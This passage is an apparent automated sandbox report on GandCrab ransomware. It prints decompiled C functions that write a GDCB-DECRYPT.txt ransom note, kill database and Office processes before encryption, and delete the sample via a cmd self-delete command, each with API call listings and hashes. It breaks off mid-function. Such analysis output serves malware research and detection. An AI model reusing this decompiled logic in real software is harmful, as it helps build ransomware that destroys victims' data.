                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                        • String ID: .bit$crab$fabian wosar <3$gand$n
                                        • API String ID: 2709691373-4182624408
                                        • Opcode ID: 90803cdf302baef34d2629e262a4b3c90835efaf7b2a7602b99ca774b972a45e
                                        • Instruction ID: 9c36e470d450ed4055a241a1299acd72cf4b3d47c7fc362c8ce505c983dfb3d8
                                        • Opcode Fuzzy Hash: 90803cdf302baef34d2629e262a4b3c90835efaf7b2a7602b99ca774b972a45e
                                        • Instruction Fuzzy Hash: 9D310671E04319A7EB11CFA8DC85BEE7BBCAB44314F204115F606B72C2E7B45A508B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7140 Relevance: 20.1, APIs: 16, Instructions: 120stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0F9D7140(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}























                                        0x0f9d7140
                                        0x0f9d7148
                                        0x0f9d714a
                                        0x0f9d714e
                                        0x0f9d7153
                                        0x0f9d7161
                                        0x0f9d7164
                                        0x0f9d7169
                                        0x0f9d7169
                                        0x0f9d716f
                                        0x0f9d7179
                                        0x0f9d7180
                                        0x0f9d7184
                                        0x0f9d7187
                                        0x0f9d7187
                                        0x0f9d718d
                                        0x0f9d719b
                                        0x0f9d719d
                                        0x0f9d71a5
                                        0x0f9d71a8
                                        0x0f9d71a8
                                        0x0f9d71ae
                                        0x0f9d71bc
                                        0x0f9d71be
                                        0x0f9d71c6
                                        0x0f9d71c9
                                        0x0f9d71c9
                                        0x0f9d71cf
                                        0x0f9d71dd
                                        0x0f9d71df
                                        0x0f9d71e7
                                        0x0f9d71ea
                                        0x0f9d71ea
                                        0x0f9d71f0
                                        0x0f9d71fe
                                        0x0f9d7200
                                        0x0f9d7208
                                        0x0f9d720b
                                        0x0f9d720b
                                        0x0f9d7211
                                        0x0f9d721f
                                        0x0f9d7221
                                        0x0f9d7229
                                        0x0f9d722c
                                        0x0f9d722c
                                        0x0f9d7232
                                        0x0f9d7240
                                        0x0f9d7242
                                        0x0f9d724a
                                        0x0f9d724d
                                        0x0f9d724d
                                        0x0f9d7253
                                        0x0f9d7255
                                        0x0f9d7255
                                        0x0f9d725c
                                        0x0f9d726a
                                        0x0f9d726c
                                        0x0f9d7274
                                        0x0f9d7277
                                        0x0f9d7277
                                        0x0f9d7280
                                        0x0f9d72ac
                                        0x0f9d7282
                                        0x0f9d7288
                                        0x0f9d72a6
                                        0x0f9d72a6

                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                        • lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7288
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7296
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID:
                                        • API String ID: 1659193697-0
                                        • Opcode ID: 6a88eac016091fd40f4fac5fda2f6562c290ef44477970f82424d7ea23117100
                                        • Instruction ID: 9d68a9b8f781679658be0a54c2da7e352ce35ebdcfacee7124517a2674326a03
                                        • Opcode Fuzzy Hash: 6a88eac016091fd40f4fac5fda2f6562c290ef44477970f82424d7ea23117100
                                        • Instruction Fuzzy Hash: 04413032101652EFD7125FB8DE8C794BBA1FF04326F188534E51682A62D775B8B8DF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D53A0 Relevance: 18.1, APIs: 12, Instructions: 92filestringmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D53A0(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}




















                                        0x0f9d53b7
                                        0x0f9d53bf
                                        0x0f9d53c9
                                        0x0f9d53cc
                                        0x0f9d53eb
                                        0x0f9d53ed
                                        0x0f9d53f3
                                        0x0f9d5404
                                        0x0f9d540a
                                        0x0f9d540f
                                        0x0f9d541a
                                        0x0f9d5420
                                        0x0f9d5425
                                        0x0f9d5427
                                        0x0f9d5427
                                        0x0f9d542b
                                        0x0f9d542e
                                        0x0f9d5435
                                        0x0f9d5437
                                        0x0f9d5442
                                        0x0f9d5444
                                        0x0f9d5446
                                        0x0f9d5449
                                        0x0f9d5453
                                        0x0f9d544b
                                        0x0f9d544b
                                        0x0f9d544d
                                        0x0f9d544e
                                        0x0f9d544e
                                        0x0f9d5458
                                        0x0f9d5459
                                        0x0f9d545f
                                        0x0f9d5464
                                        0x0f9d5446
                                        0x0f9d546b
                                        0x0f9d5471
                                        0x0f9d5474
                                        0x0f9d5474
                                        0x0f9d547a
                                        0x0f9d547a
                                        0x0f9d5481
                                        0x0f9d5481
                                        0x0f9d549b

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,0F9D55B2), ref: 0F9D53B9
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F9D55B2), ref: 0F9D53CC
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,0F9D55B2), ref: 0F9D53E5
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,0F9D55B2), ref: 0F9D5404
                                        • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,0F9D55B2), ref: 0F9D541A
                                        • lstrlenW.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D542E
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0F9D55B2), ref: 0F9D543A
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0F9D55B2), ref: 0F9D5459
                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D546B
                                        • CloseHandle.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D547A
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0F9D55B2), ref: 0F9D5481
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F9D55B2), ref: 0F9D548F
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
                                        • String ID:
                                        • API String ID: 869890170-0
                                        • Opcode ID: 91f8594f7e53ff3347cc5327525c73afad142cb364c1f65c698b8143711735c8
                                        • Instruction ID: 0a4ec33140be44d973fc6aebe2ad37e932ed4cd16b21a66ecc3e5b17ab2045a9
                                        • Opcode Fuzzy Hash: 91f8594f7e53ff3347cc5327525c73afad142cb364c1f65c698b8143711735c8
                                        • Instruction Fuzzy Hash: 2B31F670645315BBF7304FA49C4AF9D7B6CAF05B12F348014F701BA1C2CAB8A5608B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59filememorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D6BE0(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xf9e2a64; // 0x1f2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xf9e2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}









                                        0x0f9d6bfb
                                        0x0f9d6c03
                                        0x0f9d6c25
                                        0x0f9d6c2a
                                        0x0f9d6c3e
                                        0x0f9d6c45
                                        0x0f9d6c5e
                                        0x0f9d6c5e
                                        0x0f9d6c65
                                        0x0f9d6c6b
                                        0x0f9d6c2c
                                        0x0f9d6c39
                                        0x0f9d6c39
                                        0x0f9d6c78
                                        0x0f9d6c86

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F9D6CC2,00000000,?,?), ref: 0F9D6BF5
                                        • wsprintfW.USER32 ref: 0F9D6C03
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F9D6C1F
                                        • GetLastError.KERNEL32(?,?), ref: 0F9D6C2C
                                        • lstrlenW.KERNEL32(001F2000,?,00000000,?,?), ref: 0F9D6C4E
                                        • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F9D6C5E
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0F9D6C65
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6C78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                        • String ID: %s\GDCB-DECRYPT.txt
                                        • API String ID: 2985722263-4054134092
                                        • Opcode ID: 61ecc08a0d74ff2eb05ea93f08ce3620796b9f9efbc6721815f43839a10bb89a
                                        • Instruction ID: 528289e7129729d578782d09b17d4617148ebba06c88b738be64b4aae6f39272
                                        • Opcode Fuzzy Hash: 61ecc08a0d74ff2eb05ea93f08ce3620796b9f9efbc6721815f43839a10bb89a
                                        • Instruction Fuzzy Hash: DB01B5753493107BF2301B74ED4BF6A3A6CDB46B66F304114FB05E91C2DBA869708669
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D5190 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D5190() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}





                                        0x0f9d51b6
                                        0x0f9d51ba
                                        0x0f9d51be
                                        0x0f9d51c8
                                        0x0f9d51d0
                                        0x0f9d51d9
                                        0x0f9d51f3
                                        0x0f9d51f3
                                        0x0f9d51d0
                                        0x0f9d51fb

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F9D5392,00000000), ref: 0F9D51A6
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D51B8
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F9D51C8
                                        • wsprintfW.USER32 ref: 0F9D51D9
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F9D51F3
                                        • ExitProcess.KERNEL32 ref: 0F9D51FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                        • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                        • API String ID: 4033023619-516011104
                                        • Opcode ID: 88e0d11951383276035ca72d3f631ed8fe3de7c76dbd2aee08c05eca70f6a8ca
                                        • Instruction ID: 223ed9f4fdf2b1c67bcc8898d83174796d0f3b6891c94885c78c505186383b75
                                        • Opcode Fuzzy Hash: 88e0d11951383276035ca72d3f631ed8fe3de7c76dbd2aee08c05eca70f6a8ca
                                        • Instruction Fuzzy Hash: 35F030327C632177F13116655C0FF072D2C9B85F2AF398004F709BE1C389E8656086A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D46F0 Relevance: 15.1, APIs: 10, Instructions: 114processmemorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 98%
                                        			E0F9D46F0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				int _t51;
				int _t52;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t70 = CreateToolhelp32Snapshot(2, 0);
				_v172 = _t70;
				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70);
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000);
				}
				return CloseHandle(_t72);
			}





















































                                        0x0f9d46f6
                                        0x0f9d4703
                                        0x0f9d470b
                                        0x0f9d4713
                                        0x0f9d471b
                                        0x0f9d4723
                                        0x0f9d472b
                                        0x0f9d4733
                                        0x0f9d473b
                                        0x0f9d4743
                                        0x0f9d474b
                                        0x0f9d4753
                                        0x0f9d475b
                                        0x0f9d4763
                                        0x0f9d476b
                                        0x0f9d4773
                                        0x0f9d477b
                                        0x0f9d4783
                                        0x0f9d478b
                                        0x0f9d4793
                                        0x0f9d479b
                                        0x0f9d47a3
                                        0x0f9d47ab
                                        0x0f9d47b3
                                        0x0f9d47bb
                                        0x0f9d47c3
                                        0x0f9d47cb
                                        0x0f9d47d3
                                        0x0f9d47de
                                        0x0f9d47e9
                                        0x0f9d47f4
                                        0x0f9d47ff
                                        0x0f9d480a
                                        0x0f9d4815
                                        0x0f9d4820
                                        0x0f9d482b
                                        0x0f9d4836
                                        0x0f9d4841
                                        0x0f9d484c
                                        0x0f9d4857
                                        0x0f9d4874
                                        0x0f9d4878
                                        0x0f9d4882
                                        0x0f9d4886
                                        0x0f9d4888
                                        0x0f9d4891
                                        0x0f9d4893
                                        0x0f9d4895
                                        0x0f9d4895
                                        0x0f9d4891
                                        0x0f9d48a1
                                        0x0f9d48a1
                                        0x0f9d48a4
                                        0x0f9d48a4
                                        0x0f9d48b0
                                        0x0f9d48b5
                                        0x0f9d48bd
                                        0x0f9d48cb
                                        0x0f9d48cf
                                        0x0f9d48d4
                                        0x0f9d48e1
                                        0x0f9d48e1
                                        0x0f9d48cf
                                        0x0f9d48eb
                                        0x0f9d48ec
                                        0x0f9d48ec
                                        0x0f9d48ef
                                        0x0f9d48f4
                                        0x0f9d48fa
                                        0x0f9d4900
                                        0x0f9d4900
                                        0x0f9d4903
                                        0x0f9d4909
                                        0x0f9d4913
                                        0x0f9d4913
                                        0x0f9d4922

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0F9D4862
                                        • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F9D487C
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F9D4895
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F9D48B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F9D48C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F9D48D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D48E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0F9D48FA
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4913
                                        • CloseHandle.KERNEL32(?), ref: 0F9D491A
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                        • String ID:
                                        • API String ID: 3586910739-0
                                        • Opcode ID: 0a5af32f8358616a82d5ff002e8cd54016a2d25783bc7eea241d44a294886b9a
                                        • Instruction ID: 622c47e7eb27b7a4fbf34b5b108a8eb5cf91bffc6efc84e014208d04cd5bcbec
                                        • Opcode Fuzzy Hash: 0a5af32f8358616a82d5ff002e8cd54016a2d25783bc7eea241d44a294886b9a
                                        • Instruction Fuzzy Hash: FC5158B41093849FD7208F14984A75ABBE8BB8271CF70C91CF59A5B2D2C7788919CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62stringthreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0F9D2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xf9df290; // 0x21
				asm("movdqu xmm0, [0xf9df280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0F9D2AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
